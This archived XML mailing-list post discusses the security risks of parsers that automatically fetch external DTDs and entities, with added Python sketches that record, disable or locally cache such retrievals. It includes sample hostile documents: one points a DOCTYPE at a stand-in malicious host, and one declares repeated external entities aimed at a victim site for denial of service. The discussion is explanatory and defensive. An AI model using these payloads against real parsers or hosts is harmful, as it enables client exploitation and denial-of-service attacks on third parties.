OASIS Mailing List Archives


   Malicious documents? (WAS: Interesting mailing list & a rare broadside)


James Clark wrote,
> Suppose an application is trying to use validation to protect itself
> from bad input. It carefully loads the schema cache with the
> namespaces it knows about, and calls validate().  Now the bad guy
> comes along and uses a root element from some other namespace and
> uses xsi:schemaLocation to point to his own schema that has a
> declaration for that element and uses <xs:any namespace="##any"
> processContents="skip"/>.  Won't they just have almost completely
> undermined any protection that was supposed to come from validation?

This is at least partly related to something that's been worrying me on 
and off for quite a while now. It seems like a fairly obvious worry, 
but I don't recall seeing any explicit discussion of it here (or 
anywhere else for that matter).

Many (most?) off the shelf XML parsers, at least when validating, will 
by default attempt to retrieve external subsets and other entities via 
their system ids. This implies that an arbitrary XML document instance, 
whether from a trusted or untrusted source, can cause an XML processor 
to make network connections to any host on any port using any protocol  
for which retrieval is supported by the network client associated with 
the XML processor.

This opens up at least two, possibly more, kinds of attack,

* Exploiting vulnerabilities in network clients.

  A malicious host might submit the following kind of document instance
  to an XML processor,

    <?xml version="1.0"?>
    <!DOCTYPE foo SYSTEM "http://www.malicious-host.com/evil-uri">

  The server at www.malicious-host.com could return a response
  carefully crafted to exploit weaknesses in the victim XML processor's
  network client.

* Using XML processors for denial of service attacks.

  Consider the following document instance,

    <?xml version="1.0"?>
    <!DOCTYPE foo [
      <!ENTITY hit-1 SYSTEM "http://www.victim.org/victim-uri1">
      <!ENTITY hit-2 SYSTEM "http://www.victim.org/victim-uri2">

      <!-- repeat ad nauseam ... -->

      <!ENTITY hit-n-1 SYSTEM "http://www.victim.org/victim-uri-n-1">
      <!ENTITY hit-n SYSTEM "http://www.victim.org/victim-uri-n">

      <!-- repeat ad nauseam ... -->      

  When presented with such a document an unwitting XML processor might
  proceed to clobber www.victim.org.
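
To make the retrieval behaviour described above concrete, here is a minimal
Python sketch, assuming the standard library's expat-based SAX parser. The
names RecordingResolver, requested_system_ids and SAMPLE are hypothetical and
not part of the original post. Rather than fetching anything, the resolver
notes each system id the parser asks for and hands back an empty entity, so
the list it returns is the set of requests a resolve-everything processor
would have made on the document's behalf.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource


class RecordingResolver(EntityResolver):
    """Hypothetical helper: notes each system id instead of fetching it."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        # Hand back an empty in-memory entity so no connection is opened.
        empty = InputSource(systemId)
        empty.setByteStream(io.BytesIO(b""))
        return empty


def requested_system_ids(document: bytes) -> list:
    """Return the system ids a resolving parser would try to retrieve."""
    resolver = RecordingResolver()
    parser = xml.sax.make_parser()
    # Python 3.7.1 and later leave this feature off by default; it is
    # switched on here to imitate a processor that resolves everything.
    parser.setFeature(feature_external_ges, True)
    parser.setEntityResolver(resolver)
    parser.setContentHandler(ContentHandler())
    parser.parse(io.BytesIO(document))
    return resolver.requested


# A two-entity version of the denial of service document, completed with a
# root element that references the entities (an assumption of this sketch).
SAMPLE = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY hit-1 SYSTEM "http://www.victim.org/victim-uri1">
  <!ENTITY hit-2 SYSTEM "http://www.victim.org/victim-uri2">
]>
<foo>&hit-1;&hit-2;</foo>
"""
```

Calling requested_system_ids(SAMPLE) should list both victim URIs. Every
further entity declared and referenced in the document would add one more
request.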

If anyone can come up with variations on this theme I'd be extremely 
interested to hear about them.

There are, I think, a couple of conclusions to draw from the examples 
above. First, that validating untrusted documents, rather than 
protecting receiving applications, might actually be quite a dangerous 
activity. Second, that in some contexts XML document instances might be 
better thought of as being closer to active content than to text/plain
thanks to the implicit retrieval semantics of references to external entities.
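
One way to act on the first conclusion is to switch external retrieval off
before an untrusted document is parsed. The following is a sketch only,
assuming Python's standard expat-based SAX parser, which does not validate.
ElementNames, Tripwire, parse_untrusted and HOSTILE are hypothetical names
introduced for illustration. The tripwire resolver exists purely to show
that the parser never consults it once the features are disabled.

```python
import io
import xml.sax
from xml.sax.handler import (ContentHandler, EntityResolver,
                             feature_external_ges, feature_external_pes)
from xml.sax.xmlreader import InputSource


class ElementNames(ContentHandler):
    """Collects element names, to show the document itself still parses."""

    def __init__(self):
        super().__init__()
        self.names = []

    def startElement(self, name, attrs):
        self.names.append(name)


class Tripwire(EntityResolver):
    """Hypothetical resolver that counts how often it is consulted."""

    def __init__(self):
        self.calls = 0

    def resolveEntity(self, publicId, systemId):
        self.calls += 1
        # Even if consulted, answer from memory rather than the network.
        empty = InputSource(systemId)
        empty.setByteStream(io.BytesIO(b""))
        return empty


def parse_untrusted(document: bytes, handler, resolver=None) -> None:
    """Parse with external general and parameter entities switched off."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    if resolver is not None:
        parser.setEntityResolver(resolver)
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document))


# Combines both attack shapes: a remote external subset and a remote entity.
HOSTILE = b"""<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://www.malicious-host.com/evil-uri" [
  <!ENTITY hit-1 SYSTEM "http://www.victim.org/victim-uri1">
]>
<foo>&hit-1;</foo>
"""
```

With these settings the element content is still reported, while the
resolver's call count is expected to stay at zero. The cost is that
anything the external subset or entities would have contributed is
silently absent.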

Neither of these conclusions is particularly surprising, and in some 
respects they've been discussed here before under the heading of XML
application robustness. For example, a related case would be the runtime 
configuration file,

  <?xml version="1.0"?>
  <!DOCTYPE foo SYSTEM "http://www.unwise.com/config.dtd">

for an application which insists on validating its configuration on 
startup, but doesn't maintain a locally cached copy of the DTD: after 
the 10,000th sale the server at www.unwise.com collapses under the 
strain of 10,000 requests for config.dtd at 9am, leading 
to all installations of the application failing. There's also a privacy 
issue here: the DTD retrieval could be construed as the application 
"phoning home".

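The locally cached copy mentioned above can be approximated with an entity
resolver that answers known system ids from local data and refuses anything
else. This is a sketch under stated assumptions: it uses Python's standard
expat-based SAX parser, which reads the DTD but does not validate against
it, so it only demonstrates redirecting the retrieval. LocalCopyResolver,
MissingLocalCopy, load_config, CONFIG and the one-line DTD are hypothetical.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource


class MissingLocalCopy(LookupError):
    """Raised when a document names a system id with no local copy."""


class LocalCopyResolver(EntityResolver):
    """Serves entities from an in-memory table; never touches the network."""

    def __init__(self, local_copies):
        self.local_copies = dict(local_copies)  # system id -> bytes
        self.served = []

    def resolveEntity(self, publicId, systemId):
        if systemId not in self.local_copies:
            # Refuse rather than fall back to fetching the remote resource.
            raise MissingLocalCopy(systemId)
        self.served.append(systemId)
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(self.local_copies[systemId]))
        return source


def load_config(document: bytes, local_copies) -> list:
    """Parse a configuration file, returning the system ids served locally."""
    resolver = LocalCopyResolver(local_copies)
    parser = xml.sax.make_parser()
    # External entity handling is enabled so that the resolver is consulted.
    parser.setFeature(feature_external_ges, True)
    parser.setEntityResolver(resolver)
    parser.setContentHandler(ContentHandler())
    parser.parse(io.BytesIO(document))
    return resolver.served


CONFIG_DTD_URL = "http://www.unwise.com/config.dtd"
CONFIG = b"""<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://www.unwise.com/config.dtd">
<foo/>
"""
LOCAL_COPIES = {CONFIG_DTD_URL: b"<!ELEMENT foo EMPTY>"}
```

Calling load_config(CONFIG, LOCAL_COPIES) resolves the DTD without
contacting www.unwise.com, which addresses both the 9am stampede and the
"phoning home" concern. Failing loudly on an unknown system id is a design
choice of this sketch. A more forgiving application might log the request
and carry on with an empty entity.
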





Copyright 2001 XML.org. This site is hosted by OASIS